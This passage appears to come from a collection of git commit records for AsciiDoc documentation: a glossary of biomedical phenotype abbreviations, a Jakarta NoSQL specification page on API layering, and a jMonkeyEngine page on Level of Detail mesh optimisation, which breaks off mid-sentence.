O\n\nOCPD: Childhood Obsessive-Compulsive Personality Disorder\n\n\nOR: odds ratio\n\n=== P\n\nP: particle concentration\n\n\nP3MRSBP: post exercise 3 minute recovery systolic blood pressure\n\n\nPAD: peripheral artery disease\n\n\nPAI-1: plasminogen activator inhibitor\n\n\nPAL: paired associates learning\n\n\nPAR-dr: paragraph delayed recall\n\n\nPC: Protein C\n\n\nPC1: principal component axis 1, CANTAB measures\n\n\nPC2: principal component analysis 2\n\n\nPC3: principal component analysis 3\n\n\nPC aa C36:3: Phosphatidylcholine diacyl C36:3\n\n\nPC aa C36:4: Phosphatidylcholine diacyl C34:4\n\n\nPCS: Physical Component Summary\n\n\nPCV: packed cell volume\n\n\nP gingi: Porphyromonas gingivalis\n\n\nPhe: Phenylalanine\n\n\nPHT: phenytoin-induced hypersensitivity\n\n\nPKYRS: pack-years\n\n\nPL: phospholipid\n\n\nPLT: platelets\n\n\npltadp: platelet aggregation (ADP-induced)\n\n\npltcoll: platelet aggregation (collagen-induced)\n\n\nPP: pulse pressure\n\n\nppfef: percent predicted FEF25-75\u00ad for latest exam\n\n\nppfefrat: percent predicted FEF25-75\u00ad\/FVC for latest exam\n\n\nppfvc: percent predicted FVC for latest exam\n\n\nppfev1: percent predicted FEV1 for latest exam\n\n\nppFEV1\/FEC\/FEE: percent predicted FEV1\/FVC\/FEF\n\n\nppratio: percent predicted FEV1\/FVC for latest exam\n\n\nPRM: pattern recognition memory\n\n\nPROP: propylthiouracil solution\n\n\nPS: protein S\n\n\nPSC: primary sclerosing cholangitis\n\n\nPT: prothrombin time\n\n\nPUFA: polyunsaturated fatty acids\n\n=== Q\n\nQC: quality control\n\n\nQUICKI: fasting serum quantitative insulin sensitivity check index\n\n=== R\n\nRA: Rheumatoid arthritis\n\n\nRANTES: fasting serum regulated upon activation, normal T-cell expressed and secreted\n\n\nRAVLT-dr: Rey\u2019s Auditory Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n\nRBC: red blood cell\n\n\nRBCC: red blood cell count\n\n\nRDW: red cell distribution width\n\n\nRQmax: maximum respiratory quotient during treadmill fitness test\n\n\nRVP: rapid visual processing\n\n\nRW: reflected wave amplitude\n\n\nRWLTA: reflected wave amplitude, long-term average\n\n=== S\n\nS2EHR: Stage 2 exercise heart rate\n\n\nS2ESBP: stage 2 exercise systolic blood pressure\n\n\nserum TG: serum total triglyceride content\n\n\nSAS: Simpson-Angus Scale\n\n\nSBP: systolic blood pressure\n\n\nSBPLTA: systolic blood pressure, long-term average\n\n\nsCR: serum creatinine\n\n\nSCZ and BD: Schizophrenia and Bipolar disorder\n\n\ns.d.: standard deviation\n\n\nSE: sleep efficiency\n\n\nSG: Glucose effectiveness\n\n\nShaftW1: Shaft width combined\n\n\nShaftW1f: shaft width in females\n\n\nShaftZ1rf: shaft section modulus in females\n\n\nShaftZ1R: shaft section modulus\n\n\nSHBG: sex hormone binding globulin\n\n\nSI: SI from FSIGT\n\n\nsICAM-1: fasting serum soluble intercellular adhesion molecule-1\n\n\nsIL-6R: soluble interleukin\n\n\nSim: Similarities\n\n\nSleep RQ: respiratory quotient during sleep\n\n\nSLE: systemic lupus erythematosus\n\n\nSM-1: butyrylcarnitine \/ propionylcarnitine\n\n\nSM-2: N-acetylornithine\n\n\nSM-3: 1-arachidonoylglycero phosphoethanolamine \/ 1-linoleoylglycerophospho-ethanolamine\n\n\nSM-4: bilirubin (E,E) \/ oleoylcarnitine\n\n\nSM-5: hexanoylcarnitine \/ oleate (18:1n9)\n\n\nSM-6: myristate (14:0) \/ myristoleate (14:1n5)\n\n\nSM-7: 1-methylxanthine \/ 4-acetamidobutanoate\n\n\nSM-8: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\n\nSM-9: 10-nonadecenoate (19:1n9) \/ 10-undecenoate (11:1n1)\n\n\nSM-10: eicosenoate (20:1n9 or 11) \/ tetradecanedioate\n\n\nSM-11: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\nSM-12: ADSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-13: androsterone sulfate \/ epiandrosterone sulfate\n\n\nSM-14: ADpSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-15: 1-eicosatrienoylglycero-phosphocholine \/ 1-linoleoylglycero phosphocholine\n\n\nSM-16: docosahexaenoate (DHA; 22:6n3) \/ eicosapentaenoate (EPA; 20:5n3)\n\n\nSM-17: 3-(4-hydroxyphenyl)lactate \/ isovalerylcarnitine\n\n\nSMKAGE: age of initiation (years)\n\n\nSMKDU: duration (years)\n\n\nSM: sphingomyelin\n\n\nSpc: spectrum\n\n\nSP-D: surfactant protein D\n\n\nSPEED: processing speed\n\n\nSRM: spatial recognition memory\n\n\nSSP: spatial span\n\n\nsTfR: Soluble Transferrin Receptor\n\n\nStr: strict\n\n\nSVD: small-vessel disease\n\n\nSWM: spatial working memory\n\n=== T\n\nTAT: Total adipose tissue area\n\n\nTC: total cholesterol\n\n\nTEE: 24-h total energy expenditure\n\n\ntFPG: 28 year time averaged fasting plasma glucose (FPG)\n\n\nTG: triglycerides\n\n\nTGF-b1: transforming growth factor\n\n\nTG\/HDLC: fasting serum triglycerides\/high density lipoprotein cholesterol\n\n\nTIDN: Type 1 diabetes diabetic nephropathy\n\n\nTotal PS: Total Protein S\n\n\nTotal T3: fasting serum triiodothyronine\n\n\nTotal T4: fasting serum thyroxine\n\n\nTP: total protein\n\n\ntPA: tissue plasminogen activator\n\n\nTNFA: tumor necrosis factor alpha\n\n\nTRBMD: Trochanter bone mineral density\n\n\nTRBMDm: Trochanter bone mineral density males\n\n\nTSH: thyroid stimulating hormone\n\n\nTyr: Tyrosine\n\n=== U\n\nUAE: urinary albumin excretion\n\n=== V\n\nVal: Valine\n\n\nvBMD: volumetric bone mineral density\n\n\nVitD250H: Vitamin D plasma 25(OH)-D\n\n\nVitkPhylloq: Vitamin K plasma phylloquinone\n\n\nVLDL: very-low-density lipoprotein\n\n\nVLDL-D: Mean diameter for VLDL particles\n\n\nVO2max: maximum oxygen consumption during treadmill fitness test\n\n\nVOS: velocity of sound\n\n\nVPWL-dr: delayed recall for visually presented word list\n\n\nVrb: verbal\n\n\nVRM: verbal recall\n\n\nvWF: Willebrand factor\n\n=== W\n\nWBC: white blood cell\n\n\nWC: waist circumference\n\n\nWCadjBMI: WC adjustment for BMI\n\n\nWF: weight fluctuation\n\n\nWGHS: Women's Genome Health Study\n\n\nWHR: waist hip ratio\n\n\nWHRadjBMI: WHR adjustment for BMI\n\n\nWL-dr: word list delayed recall\n\n\nWRAT: Wide-Range Achievement Test\n\n=== XYZ\n\nXL-HDL-CE: The cholesterol ester content of extra large HD\n\n\nXL-HDL-TG: Triglycerides in very large HDL\n\n\nXXL-VLDL-P: extremely large VLDL particles\n\n\nYKL-40: (Chitinase 3-like 1) protein levels\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6888d9da5583dfd4756bf75ed41fb49e3273204a","subject":"improves main behind spec documentation","message":"improves main behind spec documentation\n","repos":"JNOSQL\/diana","old_file":"specification\/src\/main\/asciidoc\/mainbehindspec.adoc","new_file":"specification\/src\/main\/asciidoc\/mainbehindspec.adoc","new_contents":"\/\/\n\/\/ Copyright (c) 2018 Ot\u00e1vio Santana and others\n\/\/ All rights reserved. This program and the accompanying materials\n\/\/ are made available under the terms of the Eclipse Public License v1.0\n\/\/ and Apache License v2.0 which accompanies this distribution.\n\/\/ The Eclipse Public License is available at http:\/\/www.eclipse.org\/legal\/epl-v10.html\n\/\/ and the Apache License v2.0 is available at http:\/\/www.opensource.org\/licenses\/apache2.0.php.\n\/\/\n\/\/ You may elect to redistribute this code under either of these licenses.\n\/\/\n\/\/ Contributors:\n\/\/\n\/\/ Otavio Santana\n\n== The main idea behind the API\n\nThe divide-and-conquer strategy decreases the complexity of systems within modules or structures. These structure levels split responsibility and make maintenance and replaceability more clear. The new Jakarta NoSQL API proposal is going to be a bridge between the logic tier and the data tier. To do this, we need to create two APIs: one to communicate to a database and another one to be a high abstraction to the Java application.\n\nIn software, there are structures: tiers, physical structures, and layers. The multi-tier application has three levels:\n\n* **Presentation** tier: Has a primary duty to translate results so the user can understand.\n* **Logic tier**: Has all business rules, processes, conditions, saved information, etc. This level moves and processes information between other levels.\n* **Data tier**: Retrieves and stores information in either a database or a system file.\n\nimage::tiers.png[Tiers from a classic application structure]\n\nTalking more precisely about the physical layer and the logic to separate responsibilities, there are other layers.\n\nThe logic tier, where the application and the business rules stay, has additional layers:\n\n* **Application layer**: The bridge between the view tier and logic tier, e.g. convert an object into either JSON or HTML.\n* **Service layer**: The service layer; this can be either a Controller or a Resource.\n* **Business Layer**: This is the part of the program that encodes the real-world business or domain rules that determine how data will be created, stored, and changed.\n* **Persistence Layer**: This is a layer that provides simplified access to data stored in persistent storage of some kind.\n\nimage::logic_tier.png[Logic tier on details]\n\nWithin a persistence layer, it has its layers: A Data Access Object, DAO. This structure connects business layer and persistence layer. Inside it has an API that does database. Currently, there is a difference between SQL and NoSQL database:\n\nIn the relational database, there are two mechanisms under DAO, JDBC, and JPA:\n\n\n* **JDBC**: a deep layer with a database that has communications, underlying transactions, and is basically a driver to a particular database.\n* **JPA**: A high layer that has communication with either JDBC or JPA. This layer has a high mapping to Java; this place has annotations and an EntityManager. In general, a JPA has integrations with other specifications, such as CDI and Bean Validation.\n\nA considerable advantage of this strategy is that one change, either JDBC or JPA, can happen quickly. When you change a database, you need to supersede to a respective driver by a database, and then you're done! The code is ready for a new database change.\n\n.A usual Java application with JPA layer architecture\nimage::jpa.png[A usual Java application with JPA layer architecture]\n\nIn a NoSQL database, there isn't a strategy to save code, and there is little impact for change. All APIs are different and don't follow any one standard, so one change to a new database can result in a lot of work.\n\n* The database vendor needs to be worried about the high-level mapping to Java world, and the solution provider needs to be concerned about the low level of communication with a particular database.\n* The database vendor needs to \u201ccopy\u201d these communication solutions to all Java vendors.\n* To a Java developer, there are two lock-in types: If a developer uses an API directly for a change, it loses code. If a developer uses high-level mapping, they lock-in a Java solution because if this high level doesn't have the support to a particular NoSQL database, the developer needs to change to either a Java solution or use a NoSQL API directly.\n\n\n.A NoSQL Java application that has lock-in to each NoSQL provider\nimage::nosql_issue.png[A NoSQL Java application that has locking to each NoSQL provider]\n\nA wise recommendation might be to use the JPA because once the developer already knows this standard SQL API, they can use the same API for a relational database and apply it to a NoSQL database. Using an API with SQL concepts in NoSQL is the same as using a knife as a spoon; the result is a disaster! Furthermore, the NoSQL world has diversity with several data structures and particular behavior to each provider, and both matter in a software solution. Indeed, the merge strategy to use just one API is still a discussion nowadays.\n\nA good point about using NoSQL as a consequence polyglot persistence is that data storage is about choice. When a database offers gains, it sacrifices other aspects; it is the CAP theorem slamming the door. Hence, an API generic enough to encapsulate all kinds of databases might be useless.\n\nThe history between Java and NoSQL has several solutions that can be split by two:\n\n1. NoSQL Drivers\n2. Mapper\n * Mapper Agnostic\n * Mapper Specific\n\nThe first one is the driver API; this API has a low communication level, such as JDBC to NoSQL. It guarantees full power over the NoSQL database, a semantic closer to a database. However, it requires more code to move it forward to the entity domain the portability is pretty down; therefore, the learning curve.\n\nThe Object Mapper lets the developer work in terms of domains, thus it can help a developer follow ethical practices. A mapper may be specific, which means that a mapper is made for a particular database, so the mapper will support all the database features but with the price of a lock-in API. On the other hand, there is the agnostic mapper that uses a generic API to encapsulate the database API, which allows a developer with an API to connect several databases; however, it tends to either not cover numerous features in a database or many databases.\n\nThe rapid adoption of NoSQL combined with the vast assortment of implementations has driven a desire to create a set of standardized APIs. In the Java world, this was initially proposed in an effort by Oracle to define a NoSQL API for Java EE 9. The justification for the definition of a new API, separate form JDBC and JPA, was the following:\n\n* JPA was not designed with NoSQL in mind\n* A single set of APIs or annotations isn\u2019t adequate for all database types\n* JPA over NoSQL implies the inconsistent use of annotations\n* The diversity in the NoSQL world matters\n\nUnfortunately, what Oracle proposed for Java EE 9 was not completed when Java EE was donated to the Eclipse Foundation.\n\nTo bring innovation under the Jakarta EE umbrella, Jakarta NoSQL was born. The goal of this specification is to ease integration between Java applications and NoSQL databases, with a standard API to work with different types and vendors of NoSQL databases. To achieve this, the spec has two APIs that work like layers, and each layer has a specific goal that can integrate between each and use in isolation:\n\n* **Communication API**: Exactly what JDBC is to SQL. This API has four specializations, one for each type of database (column, document, key-value and graph). The specialties are independent of each other, optional from the point of the database vendor and have their specific TCKs.\n* **Mapping API**: This layer is based on Annotations, analogous to JPA and CDI, and preserves integration with other Jakarta EE technologies like Bean Validation and so on.\n\nJakarta EE NoSQL is the first specification in the Java enterprise. As any Java specification, it analyzes solutions that already exist, checks the history with both success and failure cases, and then goes in a direction that has a lesser number of trade-offs in an API architecture. The divide and conquer method fits well in the layer, communication, mapping, and NoSQL types. Thus, it will provide a straightforward specification, light maintenance; it will define the scope of each API; and it will work better in extensibility once the particular features matter to a NoSQL database.ut CDI events is how easy it creates and add new functionalities without changing the core code that is easy to use bean validation just to listen to an event.\n\nJakarta EE has a bright future with a significant integration with the community and open source. More transparency, after all, is the most meaningful power of Jakarta. It's not the technology itself, but the heart of the community, therefore, the success is in the hand of each developer.","old_contents":"\/\/\n\/\/ Copyright (c) 2018 Ot\u00e1vio Santana and others\n\/\/ All rights reserved. This program and the accompanying materials\n\/\/ are made available under the terms of the Eclipse Public License v1.0\n\/\/ and Apache License v2.0 which accompanies this distribution.\n\/\/ The Eclipse Public License is available at http:\/\/www.eclipse.org\/legal\/epl-v10.html\n\/\/ and the Apache License v2.0 is available at http:\/\/www.opensource.org\/licenses\/apache2.0.php.\n\/\/\n\/\/ You may elect to redistribute this code under either of these licenses.\n\/\/\n\/\/ Contributors:\n\/\/\n\/\/ Otavio Santana\n\n== The main idea behind the API\n\nOnce, we talked about the importance of the standard of a NoSQL database API; the next step is to discuss, in more details, about API. However, to make a natural explanation, we are first going to talk about both layer and tier. These structure levels make communication, maintenance, and split the responsibility clearer. The new API proposal is going to be responsible for being a bridge between the logic tier and data tier, and to do this; we need to create two APIs - one to communicate to a database and another one to be a high abstraction to Java application.\n\n\nIn software, the word is common that application has structures: tier, physical structure, and layer, logic one. The multi-tier application has three levels:\n\n* **Presentation tier**: This, as primary duty, translates the result from below tiers to what the user can understand.\n\n* **Logic tier**: The tier where has all business rules, process, conditions, etc. This level moves and processes information between other levels.\n\n* **Data tier**: Stores and retrieve information, either in a database or a system file.\n\nTalking more precisely about the physical layer, logic to separate responsibilities, there are layers\n\nThe logic tier, where the application and the business rule stay. It has layers:\n\n\n* *Application layer*: The bridge between the view tier and logic tier, e.g., Convert an object into either JSON or HTML.\n* *Service layer*: The service layer can either be a Controller or a Resource.\n* *Business Layer*: Where the whole business and the model be.\n* *Persistence Layer*: The platform between the logic tier and data tier. The layer has an integration such as DAO or repository.\n\nWithin a persistence layer, it has its layers: A Data Access Object, DAO. This structure connects business layer and persistence layer. Inside it has an API that does database. Currently, there is a difference between SQL and NoSQL database:\n\nIn the relational database, there are two mechanisms beyond DAO: JDBC, and JPA.\n\n* *JDBC*: A deep layer with a database that has communications, basic transactions; basically, it's a driver to a particular database.\n* *JPA*: A high layer that has communication, either JDBC and JPA. This layer has high mapping to Java; this place has annotations and an EntityManager. In general, a JPA has integration with other specifications such as CDI and Bean Validation.\n\nA huge advantage of this strategy is that one change, either JDBC or JPA, can happen quickly. When a developer changes a database, he just needs the switch to a respective driver by a database and done! Code ready for a new database changed.\n\n\n.A usual Java application with JPA layer architecture\nimage::jpa.png[A usual Java application with JPA layer architecture]\n\nIn a NoSQL database, there isn\u2019t a strategy to save code or little impact for a change. All APIs are different and don\u2019t follow any one standard, so one change to new database results in a lot of work. There are some solutions such as Spring Data, Hibernate OGM, TopLink NoSQL, but at a high level. In other words, if this high-level API has no support for a particular database, the result is going to be either changing a high-level API or using the API from NoSQL database directly; so, loss of a lot of code. This solution has several issues:\n\n* The database vendor needs to be worried about the high-level mapping to Java world\n* The solution provider needs to be concerned about the low level of communication with a particular database. The database vendor needs to \u201ccopy\u201d this communication solutions to all Java vendors.\n* To a Java developer, there are two lock-in types: If a developer uses an API directly for a change, it will lose code. If a developer uses a high-level mapping, this developer has locked-in a Java solution because if this high level hasn\u2019t support for a particular NoSQL database, the developer needs to change to either Java solution or use a NoSQL API directly.\n\n\n.A NoSQL Java application that has lock-in to each NoSQL provider\nimage::nosql_issue.png[A NoSQL Java application that has locking to each NoSQL provider]\n\nThe solve this problem, the API should have two layers:\n\n* The communication layer: the driver from a particular database that connects Java to an accurate database. This layer has four specializations, one for each NoSQL type.\n* The mapping level: its duty is to high concept to Java developers; this layer has annotations and integration to other specializations.\n\nThese APIs are optional to each other. In other words, a Java solution just needs to implement a great solution, and the database vendors need to implement the connection API.\n\n=== Eclipse JNoSQL\n\nThe Eclipse JNoSQL is a several tool to make easy integration between the Java Application with the NoSQL. JNoSQL has a standard API. However, NoSQL has a diversity even when both are the same type. E.g. two column family databases, HBase and Cassandra, they have particular behavior and resource that make their individual, such as Cassandra Query Language and consistency level that just does exist on Cassandra. So, the API must be extensive and configurable to have support also to a specific database. To solve this problem, the project gonna have two layers:\n\n* **Communication API**: An API just to communicate with the database, exactly what JDBC does to SQL. This API is going to have four specializations, one for each kind of database.\n* **Mapping API**: An API to do integration and do the best integration with the Java developer. That is going to be annotation driven and going to have integration with other technologies like Bean Validation, etc.\n\n.Eclipse JNoSQL\nimage::jnosql.png[Eclipse JNoSQL]\n\n==== Communication API\n\nThe communication has a goal to the low-level API; in other words, communicate with the NoSQL databases. This project is going to work as a driver to NoSQL databases. At overall, it has four APIs inside; three new APIs and Apache TinkePop to graph one for each NoSQL kind, beyond its own TCK. A test compatibility kit, the TCK, is a test group that makes sure a NoSQL database does support a database.\n\n\n==== Mapping API\n\n\nMapping API is the integration and mapping layer. In other words, it takes the communication level, and it does integration with other technologies such as Bean Validation and also with an entity model. It has a CDI engine.\n\nAs communication has, mapping also has an API to each database flavor. Using CDI as the engine, each component is configurable, and it has features such as:\n\n\n* Persist an object through annotation\n* Make replaceable any component (reflections, entity conversions, cache, persistence lifecycle and more).\n* Observe event: a continued existence database lifecycle (each database's kind has an individual event).\n\nAn important point about CDI events is how easy it creates and add new functionalities without changing the core code that is easy to use bean validation just to listen to an event.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ae65701924372d657c726595f6d6a0ad3e5da9d","subject":"fix refs","message":"fix refs\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/ROOT\/pages\/jme3\/advanced\/level_of_detail.adoc","new_file":"docs\/modules\/ROOT\/pages\/jme3\/advanced\/level_of_detail.adoc","new_contents":"= Level of Detail (LOD) Optimization\n:revnumber: 2.0\n:revdate: 2020\/07\/15\n:uri-jme3: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\n\n\nA mesh with a high level of detail has lots of polygons and looks good close up. But when the mesh is further away (and the detail is not visible), the high-polygon count slows down performance unnecessarily.\n\nOne solution for this problem is to use high-detail meshes for objects close to the camera, and low-detail meshes for objects far from the camera. As the player moves through the scene, you must keep replacing close objects by more detailed meshes, and far objects by less detailed meshes. The goal is to keep few high-quality slow-rendering objects in the foreground, and many low-quality fast-rendering objects in the background. (Experienced users can compare this approach to xref:jme3\/advanced\/terrain.adoc[JME's TerraMonkey terrain system], which internally uses the specialized GeoMipMapping algorithm to generate a terrain's Levels of Detail.)\n\nYou see now why you may want to be able to generate Levels of Detail for complex Geometries automatically. JME3 supports a Java implementation of the Ogre engine's LOD generator (originally by P\u00e9ter Sz\u00fccs and Stan Melax): You use link:{uri-jme3}\/jme3-core\/src\/tools\/java\/jme3tools\/optimize\/LodGenerator.java[jme3tools.optimize.LodGenerator] in conjunction with link:{uri-jme3}\/jme3-core\/src\/main\/java\/com\/jme3\/scene\/control\/LodControl.java[com.jme3.scene.control.LodControl].\n\nFor a demo, run link:{uri-jme3}\/jme3-examples\/src\/main\/java\/jme3test\/stress\/TestLodGeneration.java[TestLodGeneration.java] from xref:sdk:sample_code.adoc[JmeTests], then press +\/- and spacebar to experiment. The following screenshots show a monkey model with three reduced Levels of Detail:\n\nimage::jme3\/advanced\/jmonkey-lod.gif[jmonkey-lod.gif,width=\"\",height=\"\",align=\"center\"]\n\n\n\n== Usage\n\nTo activate this optimization:\n\n. Pick a reduction method and values for the Geometry. (Trial and error\u2026)\n. Generate LODs for the Geometry, either in the SDK or in code.\n. Add an LOD control to the Geometry.\n\n\n== Pick Reduction Methods and Values\n\nThere are several reduction methods to generate a low-polygon version from a high-polygon model. Don't worry, the reduction does not modify the original model.\n[cols=\"35,55,10\", options=\"header\"]\n|===\n\na|Reduction Method\na|Description\na|Reduction Value\n\na|LodGenerator.TriangleReductionMethod.COLLAPSE_COST\na|Collapses polygon vertices from the mesh until the reduction cost (= amount of ugly artifacts caused) exceeds the given threshold.\na|0.0f - 1.0f\n\na|LodGenerator.TriangleReductionMethod.PROPORTIONAL\na|Removes the given percentage of polygons from the mesh.\na| 0.0f - 1.0f\n\na|LodGenerator.TriangleReductionMethod.CONSTANT\na|Removes the given number of polygons from the mesh.\na| integer\n\n|===\n\nIf you don't know which to choose, experiment. For example start by trying COLLAPSE_COST and .5f-.9f.\n\n\n== Generate LOD\n\nYou must generate and cache several LODs for each mesh, ranging from many to few polygons. The LOD generator algorithm attempts to collaps vertices automatically, while avoiding ugly artifacts. The LOD generator doesn't generate new meshes, it only creates separate reduced index buffers for the more highly reduced levels.\n\n* If you create geometries manually (3D models), use the SDK to generate LODs.\n* If you create geometries programmatically, generate LODs from your Java code.\n\n\n=== Generating LODs in the SDK\n\nThe SDK contains a user-friendly interface to generate LODs for a model (.j3o file).\n\n. Open the Projects or Files window.\n. Select the .j3o file in the `Project Assets\/Models` directory.\n. Choose `menu:Window[Edit in SceneExplorer]` if the SceneExplorer is not open. Info about the selected model is now displayed in the SceneExplorer.\n. btn:[RMB] select the model in SceneExplorer. Choose the `menu:Tools[Generate Levels of Detail]` menu. +\nimage:jme3\/advanced\/jme-sdk-generate-lod-menu.png[The Tools Generate LOD context menu in the SceneExplorer,width=\"300\",height=\"180\"]\n. The `Generate LOD` settings wizard opens: +\nimage:jme3\/advanced\/jme-sdk-generate-lod-window.png[The Generate LOD settings wizard,width=\"300\",height=\"150\"]\n. Choose a reduction method and reduction values for one or more levels.\n+\n[TIP]\n====\nEnter higher reduction values for higher levels.\n====\n\n. Click btn:[Finish] to generate the LODs for this model.\n\nThe LODs are saved in the .j3o model file.\n\n\n[TIP]\n====\nChoose `menu:Window[Properties]` if the Properties window is not open. Choose the generated LODs from the dropdown in the Properties window, and verify their quality in the SceneComposer.\n====\n\n\n\nimage::jme3\/advanced\/jme-sdk-generate-lod-full.png[jme-sdk-generate-lod-full.png,width=\"\",height=\"\",align=\"center\"]\n\n\n\n=== Generating LODs in Code\n\nThe `jme3tools.optimize.LodGenerator` utility class helps you generate LODs for an arbitrary mesh (a Geometry object) programmatically from your Java code. You create and bake one LodGenerator for each Geometry.\n\n[source,java]\n----\nLodGenerator lod = new LodGenerator(geometry);\nlod.bakeLods(reductionMethod,reductionValue);\n----\n\nThe LODs are stored inside the Geometry object.\n\n*Example:* How to generate an LOD of myPrettyGeo's mesh with the same settings as used in the SDK example above:\n\n[source,java]\n----\nLodGenerator lod = new LodGenerator(myPrettyGeo);\nlod.bakeLods(LodGenerator.TriangleReductionMethod.PROPORTIONAL,0.25, 0.5f, 0.75f);\n----\n\n\n== Activate the LOD Control\n\nAfter generating the LODs for the geometry, you create and add a `com.jme3.scene.control.LodControl` to the geometry. Adding the LodControl activates the LOD optimizaton for this geometry.\n\n[source,java]\n----\nLodControl lc = new LodControl();\nmyPrettyGeo.addControl(lc);\nrootNode.attachChild(myPrettyGeo);\n----\n\nThe LodControl internally gets the camera from the game's viewport to calculate the distance to this geometry. Depending on the distance, the LodControl selects an appropriate level of detail, and passes more (or less) detailed vertex data to the renderer.\n\n\n== Impact on Quality and Speed\n[cols=\"10,30,20,20,20\", options=\"header\"]\n|===\n\na|Level number\na|Purpose\na|Distance\na|Rendering Speed\na|Rendering Quality\n\na|Level 0\na|The original mesh is used automatically for close-ups, and it's the default if no LODs have been generated.\na|Closest\na|Slowest.\na|Best.\n\na|Level 1 +\nLevel 2 +\nLevel 3\na|If you generated LODs, JME3 uses them automatically as soon as the object moves into the background.\na|The higher the level, +\nthe further away.\na|The higher the level, +\nthe faster.\na|The higher the level, +\nthe lower the quality.\n\n|===\n\n\n== See also\n\n* link:https:\/\/hub.jmonkeyengine.org\/t\/brand-new-lod-generator\/26341[https:\/\/hub.jmonkeyengine.org\/t\/brand-new-lod-generator\/26341]\n* link:https:\/\/github.com\/worldforge\/ember\/tree\/master\/src\/components\/ogre\/lod[https:\/\/github.com\/worldforge\/ember\/tree\/master\/src\/components\/ogre\/lod]\n* link:http:\/\/www.melax.com\/polychop[http:\/\/www.melax.com\/polychop]\n* link:http:\/\/sajty.elementfx.com\/progressivemesh\/GSoC2012.pdf[http:\/\/sajty.elementfx.com\/progressivemesh\/GSoC2012.pdf]\n* xref:jme3\/advanced\/terrain.adoc[JME3 TerraMonkey Terrain]\n","old_contents":"= Level of Detail (LOD) Optimization\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental:\n:uri-jme3: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nA mesh with a high level of detail has lots of polygons and looks good close up. But when the mesh is further away (and the detail is not visible), the high-polygon count slows down performance unnecessarily.\n\nOne solution for this problem is to use high-detail meshes for objects close to the camera, and low-detail meshes for objects far from the camera. As the player moves through the scene, you must keep replacing close objects by more detailed meshes, and far objects by less detailed meshes. The goal is to keep few high-quality slow-rendering objects in the foreground, and many low-quality fast-rendering objects in the background. (Experienced users can compare this approach to <<jme3\/advanced\/terrain#,JME's TerraMonkey terrain system>>, which internally uses the specialized GeoMipMapping algorithm to generate a terrain's Levels of Detail.)\n\nYou see now why you may want to be able to generate Levels of Detail for complex Geometries automatically. JME3 supports a Java implementation of the Ogre engine's LOD generator (originally by P\u00e9ter Sz\u00fccs and Stan Melax): You use link:{uri-jme3}\/jme3-core\/src\/tools\/java\/jme3tools\/optimize\/LodGenerator.java[jme3tools.optimize.LodGenerator] in conjunction with link:{uri-jme3}\/jme3-core\/src\/main\/java\/com\/jme3\/scene\/control\/LodControl.java[com.jme3.scene.control.LodControl].\n\nFor a demo, run link:{uri-jme3}\/jme3-examples\/src\/main\/java\/jme3test\/stress\/TestLodGeneration.java[TestLodGeneration.java] from <<sdk\/sample_code#,JmeTests>>, then press +\/- and spacebar to experiment. The following screenshots show a monkey model with three reduced Levels of Detail:\n\nimage::jme3\/advanced\/jmonkey-lod.gif[jmonkey-lod.gif,width=\"\",height=\"\",align=\"center\"]\n\n\n\n== Usage\n\nTo activate this optimization:\n\n. Pick a reduction method and values for the Geometry. (Trial and error\u2026)\n. Generate LODs for the Geometry, either in the SDK or in code.\n. Add an LOD control to the Geometry.\n\n\n== Pick Reduction Methods and Values\n\nThere are several reduction methods to generate a low-polygon version from a high-polygon model. Don't worry, the reduction does not modify the original model.\n[cols=\"35,55,10\", options=\"header\"]\n|===\n\na|Reduction Method\na|Description\na|Reduction Value\n\na|LodGenerator.TriangleReductionMethod.COLLAPSE_COST\na|Collapses polygon vertices from the mesh until the reduction cost (= amount of ugly artifacts caused) exceeds the given threshold.\na|0.0f - 1.0f\n\na|LodGenerator.TriangleReductionMethod.PROPORTIONAL\na|Removes the given percentage of polygons from the mesh.\na| 0.0f - 1.0f\n\na|LodGenerator.TriangleReductionMethod.CONSTANT\na|Removes the given number of polygons from the mesh.\na| integer\n\n|===\n\nIf you don't know which to choose, experiment. For example start by trying COLLAPSE_COST and .5f-.9f.\n\n\n== Generate LOD\n\nYou must generate and cache several LODs for each mesh, ranging from many to few polygons. The LOD generator algorithm attempts to collaps vertices automatically, while avoiding ugly artifacts. The LOD generator doesn't generate new meshes, it only creates separate reduced index buffers for the more highly reduced levels.\n\n* If you create geometries manually (3D models), use the SDK to generate LODs.\n* If you create geometries programmatically, generate LODs from your Java code.\n\n\n=== Generating LODs in the SDK\n\nThe SDK contains a user-friendly interface to generate LODs for a model (.j3o file).\n\n. Open the Projects or Files window.\n. Select the .j3o file in the `Project Assets\/Models` directory.\n. Choose `menu:Window[Edit in SceneExplorer]` if the SceneExplorer is not open. Info about the selected model is now displayed in the SceneExplorer.\n. btn:[RMB] select the model in SceneExplorer. Choose the `menu:Tools[Generate Levels of Detail]` menu. +\nimage:jme3\/advanced\/jme-sdk-generate-lod-menu.png[The Tools Generate LOD context menu in the SceneExplorer,width=\"300\",height=\"180\"]\n. The `Generate LOD` settings wizard opens: +\nimage:jme3\/advanced\/jme-sdk-generate-lod-window.png[The Generate LOD settings wizard,width=\"300\",height=\"150\"]\n. Choose a reduction method and reduction values for one or more levels.\n+\n[TIP]\n====\nEnter higher reduction values for higher levels.\n====\n\n. Click btn:[Finish] to generate the LODs for this model.\n\nThe LODs are saved in the .j3o model file.\n\n\n[TIP]\n====\nChoose `menu:Window[Properties]` if the Properties window is not open. Choose the generated LODs from the dropdown in the Properties window, and verify their quality in the 